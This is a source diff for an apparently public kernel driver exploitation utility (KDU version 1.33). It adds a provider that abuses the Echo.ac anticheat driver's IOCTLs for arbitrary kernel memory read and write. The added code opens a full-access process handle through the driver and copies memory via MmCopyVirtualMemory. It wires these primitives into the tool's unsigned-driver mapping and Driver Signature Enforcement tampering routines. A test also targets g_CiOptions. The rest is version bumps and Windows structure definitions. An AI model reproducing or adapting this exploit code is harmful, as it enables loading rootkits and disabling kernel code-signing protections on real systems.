+* EchoDrvReadWriteVirtualMemory
+*
+* Purpose:
+*
+* Read/Write virtual memory via EchoDrv.
+*
+*/
+BOOL WINAPI EchoDrvReadWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes,
+ _In_ BOOL DoWrite
+)
+{
+ ECHODRV_COPYVM_REQUEST request;
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+
+ if (DoWrite) {
+ request.FromAddress = Buffer;
+ request.ToAddress = (PVOID)VirtualAddress;
+ }
+ else {
+ request.FromAddress = (PVOID)VirtualAddress;
+ request.ToAddress = Buffer;
+ }
+
+ request.BufferSize = (SIZE_T)NumberOfBytes;
+ request.ProcessHandle = gEchoDrvClientHandle;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_ECHODRV_COPYVM,
+ &request,
+ sizeof(request),
+ &request,
+ sizeof(request));
+}
+
+/*
+* EchoDrvWriteVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory via EchoDrv.
+*
+*/
+BOOL WINAPI EchoDrvWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes
+)
+{
+ return EchoDrvReadWriteVirtualMemory(DeviceHandle,
+ VirtualAddress,
+ Buffer,
+ NumberOfBytes,
+ TRUE);
+}
+
+/*
+* EchoDrvReadVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory via EchoDrv.
+*
+*/
+BOOL WINAPI EchoDrvReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes
+)
+{
+ return EchoDrvReadWriteVirtualMemory(DeviceHandle,
+ VirtualAddress,
+ Buffer,
+ NumberOfBytes,
+ FALSE);
+}
+
+/*
+* EchoDrvRegisterDriver
+*
+* Purpose:
+*
+* Echo client registration routine.
+*
+*/
+BOOL WINAPI EchoDrvRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ UNREFERENCED_PARAMETER(Param);
+
+ BOOL bResult;
+ ECHODRV_REGISTER regRequest;
+ ECHODRV_VALIDATE_PROCESS procRequest;
+
+ RtlSecureZeroMemory(®Request, sizeof(regRequest));
+
+ //
+ // Send empty buffer so this crapware driver will remember client pid to it global variable.
+ // Theorerically this BS driver should do some crypto next-gen calculations but life is
+ // not working as authors expected.
+ //
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_ECHODRV_REGISTER,
+ ®Request,
+ sizeof(regRequest),
+ ®Request,
+ sizeof(regRequest));
+
+ if (bResult) {
+
+ //
+ // Only to make MmCopyVirtualMemory work as it expects process object as param.
+ //
+ // However we are working with kernel VA and KernelMode processor mode is set by AC.
+ //
+ RtlSecureZeroMemory(&procRequest, sizeof(procRequest));
+
+ procRequest.ProcessId = GetCurrentProcessId();
+ procRequest.DesiredAccess = GENERIC_ALL;
+
+ bResult = supCallDriver(DeviceHandle,
+ IOCTL_ECHODRV_OPEN_PROCESS,
+ &procRequest,
+ sizeof(procRequest),
+ &procRequest,
+ sizeof(procRequest));
+
+ if (bResult)
+ gEchoDrvClientHandle = procRequest.ProcessHandle;
+
+ }
+
+ return bResult;
+}
+
+/*
+* EchoDrvUnregisterDriver
+*
+* Purpose:
+*
+* Echo unregister routine.
+*
+*/
+BOOL WINAPI EchoDrvUnregisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ UNREFERENCED_PARAMETER(DeviceHandle);
+ UNREFERENCED_PARAMETER(Param);
+
+ if (gEchoDrvClientHandle)
+ NtClose(gEchoDrvClientHandle);
+
+ return TRUE;
+}
diff --git a/Source/Hamakaze/idrv/echodrv.h b/Source/Hamakaze/idrv/echodrv.h
new file mode 100644
index 0000000..adee8c8
--- /dev/null
+++ b/Source/Hamakaze/idrv/echodrv.h
@@ -0,0 +1,86 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2022
+*
+* TITLE: ECHODRV.H
+*
+* VERSION: 1.33
+*
+* DATE: 16 Jul 2023
+*
+* Inspect Element LTD spyware (anticheat) driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+//
+// Echo.ac driver uses a ridiculous IOCTL scheme which could be a side effect of intense copy-paste.
+//
+
+#define ECHODRV_DEVICE_TYPE (DWORD)0x9E6A
+#define ECHODRV_INTERFACE_TYPE_1 (DWORD)0xE622
+#define ECHODRV_INTERFACE_TYPE_2 (DWORD)0x60A2
+
+#define ECHODRV_FUNCTION_REGISTER (DWORD)0x165
+#define ECHODRV_FUNCTION_OPEN_PROCESS (DWORD)0x92
+#define ECHODRV_FUNCTION_COPYVM (DWORD)0x849
+
+#define IOCTL_ECHODRV_REGISTER \
+ CTL_CODE(ECHODRV_DEVICE_TYPE, ECHODRV_FUNCTION_REGISTER, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9E6A0594
+
+#define IOCTL_ECHODRV_OPEN_PROCESS \
+ CTL_CODE(ECHODRV_INTERFACE_TYPE_1, ECHODRV_FUNCTION_OPEN_PROCESS, METHOD_BUFFERED, FILE_READ_ACCESS) //0xE6224248
+
+#define IOCTL_ECHODRV_COPYVM \
+ CTL_CODE(ECHODRV_INTERFACE_TYPE_2, ECHODRV_FUNCTION_COPYVM, METHOD_BUFFERED, FILE_READ_ACCESS) //0x60A26124
+
+typedef struct _ECHODRV_REGISTER {
+ _In_ PUCHAR pvSignature;
+ _In_ SIZE_T cbSignature;
+ _Out_ BOOL bSuccess;
+ _Out_ DWORD UniqCode; //0x1000 for call
+} ECHODRV_REGISTER, * PECHODRV_REGISTER;
+
+typedef struct _ECHODRV_VALIDATE_PROCESS {
+ _In_ DWORD ProcessId;
+ _In_ ACCESS_MASK DesiredAccess;
+ _Out_ HANDLE ProcessHandle;
+ _Out_ BOOL bSuccess;
+ _Out_ DWORD UniqCode; //0x1001 for call
+} ECHODRV_VALIDATE_PROCESS, * PECHODRV_VALIDATE_PROCESS;
+
+typedef struct _ECHODRV_COPYVM_REQUEST {
+ _In_ HANDLE ProcessHandle;
+ _In_ PVOID FromAddress;
+ _In_ PVOID ToAddress;
+ _In_ SIZE_T BufferSize;
+ _Out_ SIZE_T NumberOfBytesCopied;
+ _Out_ BOOL bSuccess;
+ _Out_ DWORD UniqCode; //0x1002 for call
+} ECHODRV_COPYVM_REQUEST, * PECHODRV_COPY_REQUEST;
+
+BOOL WINAPI EchoDrvRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
+
+BOOL WINAPI EchoDrvUnregisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
+
+BOOL WINAPI EchoDrvReadVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI EchoDrvWriteVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index b5af61e..7d28945 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -4,9 +4,9 @@
*
* TITLE: KDUPLIST.H
*
-* VERSION: 1.32
+* VERSION: 1.33
*
-* DATE: 10 Jun 2023
+* DATE: 16 Jul 2023
*
* Providers global list.
*
@@ -43,6 +43,7 @@
#include "idrv/lenovo.h"
#include "idrv/hp.h"
#include "idrv/zodiacon.h"
+#include "idrv/echodrv.h"
//
// Victims public array.
@@ -1018,6 +1019,30 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)ZdcReadPhysicalMemory,
(provWritePhysicalMemory)ZdcWritePhysicalMemory,
+ (provValidatePrerequisites)NULL
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)EchoDrvRegisterDriver,
+ (provUnregisterDriver)EchoDrvUnregisterDriver,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE,
+
+ (provReadKernelVM)EchoDrvReadVirtualMemory,
+ (provWriteKernelVM)EchoDrvWriteVirtualMemory,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)NULL,
+ (provWritePhysicalMemory)NULL,
+
(provValidatePrerequisites)NULL
}
};
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 8308b06..86665d9 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index 66aa218..4c18f86 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index ef14f14..48a9a7d 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,3,2,2306
- PRODUCTVERSION 1,3,2,2306
+ FILEVERSION 1,3,3,2307
+ PRODUCTVERSION 1,3,3,2307
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.3.2.2306"
+ VALUE "FileVersion", "1.3.3.2307"
VALUE "InternalName", "Hamakaze.exe"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.3.2.2306"
+ VALUE "ProductVersion", "1.3.3.2307"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp
index 7927c4b..3541b21 100644
--- a/Source/Hamakaze/sup.cpp
+++ b/Source/Hamakaze/sup.cpp
@@ -4,9 +4,9 @@
*
* TITLE: SUP.CPP
*
-* VERSION: 1.32
+* VERSION: 1.33
*
-* DATE: 10 Jun 2023
+* DATE: 16 Jul 2023
*
* Program global support routines.
*
@@ -3050,33 +3050,6 @@ NTSTATUS supFilterDeviceIoControl(
return ntStatus;
}
-/*
-* supGetHalQuerySystemInformation
-*
-* Purpose:
-*
-* Return address of HalQuerySystemInformation in HalDispatchTable structure.
-*
-*/
-ULONG_PTR supGetHalQuerySystemInformation(
- _In_ ULONG_PTR NtOsLoadedBase,
- _In_ ULONG_PTR NtOsMappedBase
-)
-{
- ULONG_PTR base = NtOsLoadedBase, address, result = 0;
-
- address = (ULONG_PTR)GetProcAddress((HINSTANCE)NtOsMappedBase, "HalDispatchTable");
- if (address) {
-
- address += sizeof(ULONG_PTR); //skip aligned Version field
- address = base + address - (ULONG_PTR)NtOsMappedBase;
- result = address;
-
- }
-
- return result;
-}
-
/*
* supQueryPhysicalMemoryLayout
*
diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h
index 73adc75..eb6e1e9 100644
--- a/Source/Hamakaze/sup.h
+++ b/Source/Hamakaze/sup.h
@@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
-* VERSION: 1.32
+* VERSION: 1.33
*
-* DATE: 10 Jun 2023
+* DATE: 16 Jun 2023
*
* Support routines header file.
*
@@ -361,10 +361,6 @@ NTSTATUS supFilterDeviceIoControl(
_In_ ULONG OutBufferSize,
_Out_opt_ PULONG BytesReturned);
-ULONG_PTR supGetHalQuerySystemInformation(
- _In_ ULONG_PTR NtOsLoadedBase,
- _In_ ULONG_PTR NtOsMappedBase);
-
PCM_RESOURCE_LIST supQueryPhysicalMemoryLayout(
VOID);
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index 09e1c27..499bf77 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -4,9 +4,9 @@
*
* TITLE: TESTS.CPP
*
-* VERSION: 1.31
+* VERSION: 1.33
*
-* DATE: 10 Apr 2023
+* DATE: 16 Jul 2023
*
* KDU tests.
*
@@ -57,7 +57,7 @@ VOID KDUTestLoad()
VOID KDUTestDSE(PKDU_CONTEXT Context)
{
- ULONG_PTR g_CiOptions = 0xfffff8077d239418;//need update
+ ULONG_PTR g_CiOptions = 0xfffff8044e039418;//need update
ULONG_PTR oldValue = 0, newValue = 0x0, testValue = 0;
KDU_PROVIDER* prov = Context->Provider;
@@ -188,7 +188,7 @@ VOID KDUTest()
// KDUTestLoad();
// TestSymbols();
- Context = KDUProviderCreate(38,
+ Context = KDUProviderCreate(39,
FALSE,
NT_WIN10_20H1,
KDU_SHELLCODE_V1,
diff --git a/Source/Hamakaze/wdksup.h b/Source/Hamakaze/wdksup.h
index 6695cfd..8c51f27 100644
--- a/Source/Hamakaze/wdksup.h
+++ b/Source/Hamakaze/wdksup.h
@@ -4,9 +4,9 @@
*
* TITLE: WDKSUP.H
*
-* VERSION: 1.31
+* VERSION: 1.33
*
-* DATE: 08 Apr 2023
+* DATE: 16 Jul 2023
*
* Header file for NT WDK definitions.
*
@@ -26,6 +26,8 @@
// Processor modes.
//
+#ifndef NTOS_RTL
+
typedef CCHAR KPROCESSOR_MODE;
typedef enum _MODE {
@@ -34,6 +36,8 @@ typedef enum _MODE {
MaximumMode
} MODE;
+#endif
+
#define FIXED_UNICODE_STRING_LENGTH MAX_PATH
typedef struct _FIXED_UNICODE_STRING {
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index e602a21..9a484bf 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.32
+* VERSION: 1.33
*
-* DATE: 10 Jun 2023
+* DATE: 16 Jul 2023
*
* Global consts.
*
@@ -21,15 +21,15 @@
#define KDU_VERSION_MAJOR 1
#define KDU_VERSION_MINOR 3
-#define KDU_VERSION_REVISION 2
-#define KDU_VERSION_BUILD 2306
+#define KDU_VERSION_REVISION 3
+#define KDU_VERSION_BUILD 2307
#define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1
#define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined
#define IPC_GET_HANDLE 0x1337
-#define KDU_SYNC_MUTANT 0x2306
+#define KDU_SYNC_MUTANT 0x2307
#define NT_REG_PREP L"\\Registry\\Machine"
#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
@@ -141,6 +141,7 @@
#define IDR_KOBJEXP 140
#define IDR_KREGEXP 141
#define IDR_RESERVED8 142
+#define IDR_ECHODRV 143
//
// Vulnerable drivers providers id
@@ -184,6 +185,7 @@
#define KDU_PROVIDER_KEXPLORE 36
#define KDU_PROVIDER_KOBJEXP 37
#define KDU_PROVIDER_KREGEXP 38
+#define KDU_PROVIDER_ECHODRV 39
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
diff --git a/Source/Shared/ntos/ntos.h b/Source/Shared/ntos/ntos.h
index bba4332..aa4b18b 100644
--- a/Source/Shared/ntos/ntos.h
+++ b/Source/Shared/ntos/ntos.h
@@ -5,9 +5,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.210
+* VERSION: 1.218
*
-* DATE: 11 Apr 2023
+* DATE: 13 Jul 2023
*
* Common header file for the ntos API functions and definitions.
*
@@ -182,6 +182,12 @@ typedef PVOID PMEM_EXTENDED_PARAMETER;
#define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5)
#define NtCurrentThreadEffectiveToken() ((HANDLE)(LONG_PTR)-6) //GetCurrentThreadEffectiveToken
+enum _KPROCESSOR_MODE {
+ KernelMode = 0,
+ UserMode,
+ MaximumMode
+};
+
//
// ntdef.h begin
//
@@ -739,12 +745,13 @@ typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION {
ULONG_PTR Reserved4;
} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;
-typedef struct _SYSTEM_PROCESSES_INFORMATION {
+typedef struct _SYSTEM_PROCESS_INFORMATION {
ULONG NextEntryDelta;
ULONG ThreadCount;
- LARGE_INTEGER SpareLi1;
- LARGE_INTEGER SpareLi2;
- LARGE_INTEGER SpareLi3;
+ LARGE_INTEGER WorkingSetPrivateSize;
+ ULONG HardFaultCount;
+ ULONG NumberOfThreadsHighWatermark;
+ ULONGLONG CycleTime;
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
@@ -754,11 +761,11 @@ typedef struct _SYSTEM_PROCESSES_INFORMATION {
HANDLE InheritedFromUniqueProcessId;
ULONG HandleCount;
ULONG SessionId;
- ULONG_PTR PageDirectoryBase;
+ ULONG_PTR UniqueProcessKey;
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
- SYSTEM_THREAD_INFORMATION Threads[1];
-} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION;
+ SYSTEM_THREAD_INFORMATION Threads[1]; //not a part of this structure
+} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef enum _SYSTEM_PROCESS_CLASSIFICATION {
SystemProcessClassificationNormal,
@@ -837,10 +844,10 @@ typedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION {
ULONGLONG ProcessSequenceNumber;
} SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION;
-typedef struct _SYSTEM_PROCESSES_FULL_INFORMATION {
- SYSTEM_PROCESSES_INFORMATION ProcessAndThreads;
+typedef struct _SYSTEM_PROCESS_FULL_INFORMATION {
+ SYSTEM_PROCESS_INFORMATION ProcessAndThreads;
SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo;
-} SYSTEM_PROCESSES_FULL_INFORMATION, *PSYSTEM_PROCESSES_FULL_INFORMATION;
+} SYSTEM_PROCESS_FULL_INFORMATION, *PSYSTEM_PROCESS_FULL_INFORMATION;
typedef struct _SYSTEM_PROCESS_ID_INFORMATION {
HANDLE ProcessId;
@@ -962,6 +969,10 @@ typedef struct _SYSTEM_BIGPOOL_INFORMATION {
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;
+typedef struct _SYSTEM_FIRMWARE_PARTITION_INFORMATION {
+ UNICODE_STRING FirmwarePartition; // \Device\HarddiskX
+} SYSTEM_FIRMWARE_PARTITION_INFORMATION, * PSYSTEM_FIRMWARE_PARTITION_INFORMATION;
+
typedef struct _RTL_PROCESS_BACKTRACE_INFORMATION {
PCHAR SymbolicBackTrace;
ULONG TraceCount;
@@ -1028,7 +1039,7 @@ typedef enum _PROCESSINFOCLASS {
ProcessMemoryAllocationMode = 46,
ProcessGroupInformation = 47,
ProcessTokenVirtualizationEnabled = 48,
- ProcessOwnerInformation = 49,
+ ProcessConsoleHostProcess = 49, //ProcessOwnerInformation
ProcessWindowInformation = 50,
ProcessHandleInformation = 51,
ProcessMitigationPolicy = 52,
@@ -1172,6 +1183,18 @@ typedef struct _THREAD_BASIC_INFORMATION {
LONG BasePriority;
} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;
+// taken from ph2(whatever)
+typedef struct _THREAD_LAST_SYSCALL_INFORMATION {
+ PVOID FirstArgument;
+ USHORT SystemCallNumber;
+#ifdef WIN64
+ USHORT Pad[0x3]; // since REDSTONE2
+#else
+ USHORT Pad[0x1]; // since REDSTONE2
+#endif
+ ULONG64 WaitTime;
+} THREAD_LAST_SYSCALL_INFORMATION, * PTHREAD_LAST_SYSCALL_INFORMATION;
+
typedef struct _THREAD_NAME_INFORMATION {
UNICODE_STRING ThreadName;
} THREAD_NAME_INFORMATION, * PTHREAD_NAME_INFORMATION;
@@ -1214,8 +1237,8 @@ typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
} PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;
typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
- ULONG NumberOfHandles;
- ULONG Reserved;
+ ULONG_PTR NumberOfHandles;
+ ULONG_PTR Reserved;
PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;
@@ -1593,6 +1616,12 @@ typedef struct _PROCESS_WS_WATCH_INFORMATION_EX {
ULONG_PTR Flags;
} PROCESS_WS_WATCH_INFORMATION_EX, * PPROCESS_WS_WATCH_INFORMATION_EX;
+typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
+ ULONG Version;
+ ULONG Reserved;
+ PVOID Callback;
+} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION, * PPROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;
+
/*
** Processes END
*/
@@ -5629,6 +5658,93 @@ typedef struct _MEMORY_ENCLAVE_IMAGE_INFORMATION {
UCHAR AuthorID[32];
} MEMORY_ENCLAVE_IMAGE_INFORMATION, * PMEMORY_ENCLAVE_IMAGE_INFORMATION;
+typedef struct _MEMORY_WORKING_SET_BLOCK {
+ ULONG_PTR Protection : 5;
+ ULONG_PTR ShareCount : 3;
+ ULONG_PTR Shared : 1;
+ ULONG_PTR Node : 3;
+#ifdef _WIN64
+ ULONG_PTR VirtualPage : 52;
+#else
+ ULONG VirtualPage : 20;
+#endif
+} MEMORY_WORKING_SET_BLOCK, * PMEMORY_WORKING_SET_BLOCK;
+
+typedef struct _MEMORY_WORKING_SET_INFORMATION {
+ ULONG_PTR NumberOfEntries;
+ _Field_size_(NumberOfEntries) MEMORY_WORKING_SET_BLOCK WorkingSetInfo[1];
+} MEMORY_WORKING_SET_INFORMATION, * PMEMORY_WORKING_SET_INFORMATION;
+
+typedef struct _MEMORY_WORKING_SET_EX_BLOCK {
+ union {
+ struct {
+ ULONG_PTR Valid : 1;
+ ULONG_PTR ShareCount : 3;
+ ULONG_PTR Win32Protection : 11;
+ ULONG_PTR Shared : 1;
+ ULONG_PTR Node : 6;
+ ULONG_PTR Locked : 1;
+ ULONG_PTR LargePage : 1;
+ ULONG_PTR Priority : 3;
+ ULONG_PTR Reserved : 3;
+ ULONG_PTR SharedOriginal : 1;
+ ULONG_PTR Bad : 1;
+ ULONG_PTR Win32GraphicsProtection : 4;
+#ifdef _WIN64
+ ULONG_PTR ReservedUlong : 28;
+#endif
+ };
+ struct {
+ ULONG_PTR Valid : 1;
+ ULONG_PTR Reserved0 : 14;
+ ULONG_PTR Shared : 1;
+ ULONG_PTR Reserved1 : 5;
+ ULONG_PTR PageTable : 1;
+ ULONG_PTR Location : 2;
+ ULONG_PTR Priority : 3;
+ ULONG_PTR ModifiedList : 1;
+ ULONG_PTR Reserved2 : 2;
+ ULONG_PTR SharedOriginal : 1;
+ ULONG_PTR Bad : 1;
+#ifdef _WIN64
+ ULONG_PTR ReservedUlong : 32;
+#endif
+ } Invalid;
+ };
+} MEMORY_WORKING_SET_EX_BLOCK, * PMEMORY_WORKING_SET_EX_BLOCK;
+
+typedef struct _MEMORY_WORKING_SET_EX_INFORMATION {
+ PVOID VirtualAddress;
+ union {
+ MEMORY_WORKING_SET_EX_BLOCK VirtualAttributes;
+ ULONG_PTR Long;
+ } u1;
+} MEMORY_WORKING_SET_EX_INFORMATION, * PMEMORY_WORKING_SET_EX_INFORMATION;
+
+#define MM_ZERO_ACCESS 0 // this value is not used.
+#define MM_READONLY 1
+#define MM_EXECUTE 2
+#define MM_EXECUTE_READ 3
+#define MM_READWRITE 4 // bit 2 is set if this is writable.
+#define MM_WRITECOPY 5
+#define MM_EXECUTE_READWRITE 6
+#define MM_EXECUTE_WRITECOPY 7
+
+#define MM_NOCACHE 0x8
+#define MM_GUARD_PAGE 0x10
+#define MM_DECOMMIT 0x10 // NO_ACCESS, Guard page
+#define MM_NOACCESS 0x18 // NO_ACCESS, Guard_page, nocache.
+#define MM_UNKNOWN_PROTECTION 0x100 // bigger than 5 bits!
+
+#define MM_INVALID_PROTECTION ((ULONG)-1) // bigger than 5 bits!
+
+#define MM_PROTECTION_WRITE_MASK 4
+#define MM_PROTECTION_COPY_MASK 1
+#define MM_PROTECTION_OPERATION_MASK 7 // mask off guard page and nocache.
+#define MM_PROTECTION_EXECUTE_MASK 2
+
+#define MM_SECURE_DELETE_CHECK 0x55
+
/*
** Virtual Memory END
*/
@@ -5674,8 +5790,6 @@ typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
-#define GDI_MAX_HANDLE_COUNT 0x4000 //0xFFFF
-
// 32-bit definitions
typedef struct _STRING32 {
USHORT Length;
@@ -6003,32 +6117,6 @@ typedef struct _PEB_LDR_DATA {
HANDLE ShutdownThreadId;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
-typedef struct _GDI_HANDLE_ENTRY {
- union
- {
- PVOID Object;
- PVOID NextFree;
- };
- union
- {
- struct
- {
- USHORT ProcessId;
- USHORT Lock : 1;
- USHORT Count : 15;
- };
- ULONG Value;
- } Owner;
- USHORT Unique;
- UCHAR Type;
- UCHAR Flags;
- PVOID UserPointer;
-} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY;
-
-typedef struct _GDI_SHARED_MEMORY {
- GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT];
-} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY;
-
#ifndef FLS_MAXIMUM_AVAILABLE
#define FLS_MAXIMUM_AVAILABLE 128
#endif
@@ -6312,7 +6400,7 @@ typedef struct _GDI_TEB_BATCH {
} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
typedef struct _ACTIVATION_CONTEXT_DATA {
- ULONG Magic;
+ ULONG Magic; //'xtcA'
ULONG HeaderSize;
ULONG FormatVersion;
ULONG TotalSize;
@@ -6716,7 +6804,9 @@ typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
struct {
DWORD DisallowWin32kSystemCalls : 1;
DWORD AuditDisallowWin32kSystemCalls : 1;
- DWORD ReservedFlags : 30;
+ DWORD DisallowFsctlSystemCalls : 1;
+ DWORD AuditDisallowFsctlSystemCalls : 1;
+ DWORD ReservedFlags : 28;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;
@@ -7970,11 +8060,11 @@ typedef struct _LDR_DATA_TABLE_ENTRY_FULL
USHORT TlsIndex;
LIST_ENTRY HashLinks;
ULONG TimeDateStamp;
- struct _ACTIVATION_CONTEXT* EntryPointActivationContext;
+ PACTIVATION_CONTEXT EntryPointActivationContext;
PVOID Lock;
PLDR_DDAG_NODE DdagNode;
LIST_ENTRY NodeModuleLink;
- struct _LDRP_LOAD_CONTEXT* LoadContext;
+ PVOID LoadContext;
PVOID ParentDllBase;
PVOID SwitchBackContext;
RTL_BALANCED_NODE BaseAddressIndexNode;
@@ -7987,12 +8077,9 @@ typedef struct _LDR_DATA_TABLE_ENTRY_FULL
ULONG ReferenceCount;
ULONG DependentLoadFlags;
UCHAR SigningLevel;
- CHAR Padding1[3];
- ULONG CheckSum;
- LONG Padding2;
+ ULONG CheckSum;
PVOID ActivePatchImageBase;
LDR_HOT_PATCH_STATE HotPatchState;
- LONG __PADDING__[1];
} LDR_DATA_TABLE_ENTRY_FULL, * PLDR_DATA_TABLE_ENTRY_FULL;
typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
@@ -8366,46 +8453,6 @@ LdrControlFlowGuardEnforced(
** LDR END
*/
-/*
-* WIN32K OBJECTS START
-*/
-
-typedef struct _HANDLEENTRY {
- PHEAD phead; // Pointer to the Object.
- PVOID pOwner; // PTI or PPI
- BYTE bType; // Object handle type
- BYTE bFlags; // Flags
- WORD wUniq; // Access count.
-} HANDLEENTRY, *PHANDLEENTRY;
-
-typedef struct _SERVERINFO {
- WORD wRIPFlags;
- WORD wSRVIFlags;
- WORD wRIPPID;
- WORD wRIPError;
- ULONG cHandleEntries;
- // incomplete
-} SERVERINFO, *PSERVERINFO;
-
-typedef struct _SHAREDINFO {
- PSERVERINFO psi;
